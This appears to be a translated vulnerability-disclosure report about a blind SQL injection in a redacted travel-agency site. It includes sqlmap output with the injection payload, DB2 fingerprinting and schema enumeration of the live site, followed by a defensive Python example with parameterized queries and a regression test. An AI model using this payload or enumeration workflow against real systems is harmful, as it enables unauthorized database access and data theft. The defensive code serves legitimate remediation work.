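2015-11-01: Details reported to the vendor; awaiting vendor handling
2015-11-05: Vendor confirmed; details disclosed to the vendor only
2015-11-15: Details disclosed to core white hats and experts in related fields
2015-11-25: Details disclosed to regular white hats
2015-12-05: Details disclosed to intern white hats
2015-12-20: Details disclosed to the public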
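Please route this through the major-vendor process.
One of the top ten travel agencies. See:
Down to business. Injection point: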
http://**.**.**.**/account/getxytg?filetype=G
GET parameter 'filetype' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: filetype (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: filetype=G' AND 7406=7406 AND 'PPbT'='PPbT
---
[15:49:14] [INFO] testing MySQL
[15:49:14] [WARNING] the back-end DBMS is not MySQL
[15:49:14] [INFO] testing Oracle
[15:49:35] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)
[15:49:36] [WARNING] the back-end DBMS is not Oracle
[15:49:36] [INFO] testing PostgreSQL
[15:49:36] [WARNING] the back-end DBMS is not PostgreSQL
[15:49:36] [INFO] testing Microsoft SQL Server
[15:49:36] [WARNING] the back-end DBMS is not Microsoft SQL Server
[15:49:36] [INFO] testing SQLite
[15:49:36] [WARNING] the back-end DBMS is not SQLite
[15:49:36] [INFO] testing Microsoft Access
[15:49:36] [WARNING] the back-end DBMS is not Microsoft Access
[15:49:36] [INFO] testing Firebird
[15:49:37] [WARNING] the back-end DBMS is not Firebird
[15:49:37] [INFO] testing SAP MaxDB
[15:49:37] [WARNING] the back-end DBMS is not SAP MaxDB
[15:49:37] [INFO] testing Sybase
[15:49:37] [WARNING] the back-end DBMS is not Sybase
[15:49:37] [INFO] testing IBM DB2
[15:49:37] [INFO] confirming IBM DB2
[15:49:41] [INFO] the back-end DBMS is IBM DB2
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: IBM DB2
[15:49:41] [WARNING] schema names are going to be used on IBM DB2 for enumeration as the counterpart to database names on other DBMSes
[15:49:41] [INFO] fetching database (schema) names
[15:49:41] [INFO] fetching number of databases
[15:49:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:49:41] [INFO] retrieved: 13
[15:49:43] [INFO] retrieved:
[15:50:05] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)o
[15:50:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)vm
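There are 13 databases. Since this is the third-ranked travel agency, the data volume is definitely not small ^_^
Because it is the uncommon IBM DB2 database, several of the databases come back garbled:
How can the garbling problem be solved? I tried several encodings and none of them worked...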
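Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-11-05 14:52
No direct handling channel has been established with the organization that manages the site yet; awaiting claim.
None yet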
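The boolean-based blind finding on `filetype` reported above, reproduced as an added example (not part of the original report or the vendor's code) that contrasts string concatenation with a bound parameter and gives a regression check for the fix. Assumptions: Python's `sqlite3` stands in for the IBM DB2 back end, the `docs` table, its rows and the allowlist are constructed, and the always-false probe is the constructed counterpart of the payload in the sqlmap output.

```python
import sqlite3

# Payload reported by sqlmap on this page, plus its always-false twin (constructed).
TRUE_PROBE = "G' AND 7406=7406 AND 'PPbT'='PPbT"
FALSE_PROBE = "G' AND 7406=7407 AND 'PPbT'='PPbT"
ALLOWED_FILETYPES = {"G", "H"}  # hypothetical allowlist of valid values

def make_db():
    """In-memory stand-in; table and rows are constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE docs (filetype TEXT, name TEXT)")
    db.executemany("INSERT INTO docs VALUES (?, ?)",
                   [("G", "group-a.pdf"), ("G", "group-b.pdf"), ("H", "hotel.pdf")])
    return db

def lookup_concatenated(db, filetype):
    """Vulnerable pattern: the parameter becomes part of the SQL text."""
    sql = "SELECT name FROM docs WHERE filetype = '" + filetype + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, filetype):
    """Hardened pattern: the value is bound, so quotes stay data."""
    sql = "SELECT name FROM docs WHERE filetype = ?"
    return [row[0] for row in db.execute(sql, (filetype,))]

def lookup_hardened(db, filetype):
    """Bound parameter plus allowlist validation before the query runs."""
    if filetype not in ALLOWED_FILETYPES:
        raise ValueError("filetype not allowed")
    return lookup_bound(db, filetype)

def has_boolean_oracle(lookup, db):
    """True if the two probes produce different responses (injectable)."""
    return lookup(db, TRUE_PROBE) != lookup(db, FALSE_PROBE)

if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks a boolean:", has_boolean_oracle(lookup_concatenated, db))
    print("bound query leaks a boolean:", has_boolean_oracle(lookup_bound, db))
```

Keeping `has_boolean_oracle` in the test suite for each query helper catches a regression back to concatenation.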